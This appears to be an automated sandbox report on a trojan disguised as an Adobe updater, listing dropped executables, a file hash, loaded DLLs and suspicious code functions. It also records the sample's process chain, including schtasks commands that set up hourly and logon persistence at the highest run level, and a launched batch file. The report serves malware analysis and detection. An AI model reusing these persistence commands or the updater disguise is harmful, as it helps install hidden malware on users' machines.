Source: MyProg.exe.1.dr Static PE information: section name: Y|uR
PE file has a writeable .text section
Source: xRp.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Code function: 0_2_00622040 0_2_00622040
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Code function: 0_2_0068F980 0_2_0068F980
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Code function: 0_2_00703188 0_2_00703188
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Code function: 0_2_006FFA00 0_2_006FFA00
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Code function: 0_2_006222C0 0_2_006222C0
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Code function: 0_2_006F9AB0 0_2_006F9AB0
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Code function: 0_2_0062A290 0_2_0062A290
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Code function: 0_2_006A0BF0 0_2_006A0BF0
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Code function: 0_2_00639BC0 0_2_00639BC0
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Code function: 0_2_00708BCF 0_2_00708BCF
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Code function: 0_2_0071C4A1 0_2_0071C4A1
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Code function: 0_2_00633D50 0_2_00633D50
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Code function: 0_2_006AAE60 0_2_006AAE60
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Code function: 0_2_0062A6C0 0_2_0062A6C0
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Code function: 0_2_006A3ED0 0_2_006A3ED0
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 1_2_004E6076 1_2_004E6076
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 1_2_004E6D00 1_2_004E6D00
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 9_2_00AB2040 9_2_00AB2040
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 9_2_00B93188 9_2_00B93188
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 9_2_00B1F980 9_2_00B1F980
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 9_2_00B89AB0 9_2_00B89AB0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 9_2_00ABA290 9_2_00ABA290
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 9_2_00AB22C0 9_2_00AB22C0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 9_2_00B8FA00 9_2_00B8FA00
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 9_2_00B30BF0 9_2_00B30BF0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 9_2_00AC9BC0 9_2_00AC9BC0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 9_2_00B98BCF 9_2_00B98BCF
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 9_2_00BAC4A1 9_2_00BAC4A1
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 9_2_00AC3D50 9_2_00AC3D50
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 9_2_00B33ED0 9_2_00B33ED0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 9_2_00ABA6C0 9_2_00ABA6C0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 9_2_00B3AE60 9_2_00B3AE60
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 10_2_00AB2040 10_2_00AB2040
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 10_2_00B93188 10_2_00B93188
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 10_2_00B1F980 10_2_00B1F980
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 10_2_00B89AB0 10_2_00B89AB0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 10_2_00ABA290 10_2_00ABA290
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 10_2_00AB22C0 10_2_00AB22C0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 10_2_00B8FA00 10_2_00B8FA00
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 10_2_00B30BF0 10_2_00B30BF0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 10_2_00AC9BC0 10_2_00AC9BC0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 10_2_00B98BCF 10_2_00B98BCF
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 10_2_00BAC4A1 10_2_00BAC4A1
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 10_2_00AC3D50 10_2_00AC3D50
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 10_2_00B33ED0 10_2_00B33ED0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 10_2_00ABA6C0 10_2_00ABA6C0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 10_2_00B3AE60 10_2_00B3AE60
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 12_2_005C2040 12_2_005C2040
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 12_2_006A3188 12_2_006A3188
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 12_2_0062F980 12_2_0062F980
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 12_2_0069FA00 12_2_0069FA00
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 12_2_005C22C0 12_2_005C22C0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 12_2_005CA290 12_2_005CA290
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 12_2_00699AB0 12_2_00699AB0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 12_2_00640BF0 12_2_00640BF0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 12_2_005D9BC0 12_2_005D9BC0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 12_2_006A8BCF 12_2_006A8BCF
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 12_2_006BC4A1 12_2_006BC4A1
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 12_2_005D3D50 12_2_005D3D50
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 12_2_0064AE60 12_2_0064AE60
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 12_2_005CA6C0 12_2_005CA6C0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 12_2_00643ED0 12_2_00643ED0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 14_2_005C2040 14_2_005C2040
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 14_2_006A3188 14_2_006A3188
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 14_2_0062F980 14_2_0062F980
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 14_2_0069FA00 14_2_0069FA00
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 14_2_005C22C0 14_2_005C22C0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 14_2_005CA290 14_2_005CA290
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 14_2_00699AB0 14_2_00699AB0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 14_2_00640BF0 14_2_00640BF0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 14_2_005D9BC0 14_2_005D9BC0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 14_2_006A8BCF 14_2_006A8BCF
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 14_2_006BC4A1 14_2_006BC4A1
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 14_2_005D3D50 14_2_005D3D50
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 14_2_0064AE60 14_2_0064AE60
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 14_2_005CA6C0 14_2_005CA6C0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 14_2_00643ED0 14_2_00643ED0
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 15_2_00E36076 15_2_00E36076
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 15_2_00E36D00 15_2_00E36D00
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\xRp.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: String function: 0069CBF0 appears 46 times
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: String function: 00B8CBF0 appears 46 times
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 1776
PE file contains executable resources (Code or Archives)
Source: AdobeUpdaterV131.exe Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: MPGPH131.exe.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: RageMP131.exe.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: MyProg.exe.1.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
Sample file is different than original file name gathered from version info
Source: AdobeUpdaterV131.exe, 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameheidisql.exe2 vs AdobeUpdaterV131.exe
Source: AdobeUpdaterV131.exe, 00000000.00000002.4131681173.0000000001350000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameheidisql.exe2 vs AdobeUpdaterV131.exe
Source: AdobeUpdaterV131.exe Binary or memory string: OriginalFilenameheidisql.exe2 vs AdobeUpdaterV131.exe
Uses 32bit PE files
Source: AdobeUpdaterV131.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: xRp.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: xRp.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: xRp.exe.0.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: AdobeUpdaterV131.exe Static PE information: Section: ZLIB complexity 0.999878358004386
Source: MPGPH131.exe.0.dr Static PE information: Section: ZLIB complexity 0.999878358004386
Source: RageMP131.exe.0.dr Static PE information: Section: ZLIB complexity 0.999878358004386
Source: classification engine Classification label: mal100.spre.troj.evad.winEXE@27/29@1/2
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 1_2_004E119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle, 1_2_004E119F
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 15_2_00E3119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle, 15_2_00E3119F
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe File created: C:\Users\user\AppData\Local\RageMP131 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7248:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6568
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe File created: C:\Users\user\AppData\Local\Temp\xRp.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\0be11806.bat" "
Source: C:\Users\user\AppData\Local\Temp\xRp.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: AdobeUpdaterV131.exe, 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, AdobeUpdaterV131.exe, 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, MPGPH131.exe, 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, RageMP131.exe, 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: AdobeUpdaterV131.exe, 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, AdobeUpdaterV131.exe, 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, MPGPH131.exe, 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, RageMP131.exe, 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: AdobeUpdaterV131.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: MPGPH131.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: MPGPH131.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RageMP131.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RageMP131.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe File read: C:\Users\user\Desktop\AdobeUpdaterV131.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\AdobeUpdaterV131.exe "C:\Users\user\Desktop\AdobeUpdaterV131.exe"
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Process created: C:\Users\user\AppData\Local\Temp\xRp.exe C:\Users\user\AppData\Local\Temp\xRp.exe
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 1776
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: unknown Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process created: C:\Users\user\AppData\Local\Temp\xRp.exe C:\Users\user\AppData\Local\Temp\xRp.exe
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\0be11806.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Process created: C:\Users\user\AppData\Local\Temp\xRp.exe C:\Users\user\AppData\Local\Temp\xRp.exe Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process created: C:\Users\user\AppData\Local\Temp\xRp.exe C:\Users\user\AppData\Local\Temp\xRp.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\0be11806.bat" " Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winmm.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wininet.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: devobj.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winmm.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wininet.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: devobj.dll Jump to behavior
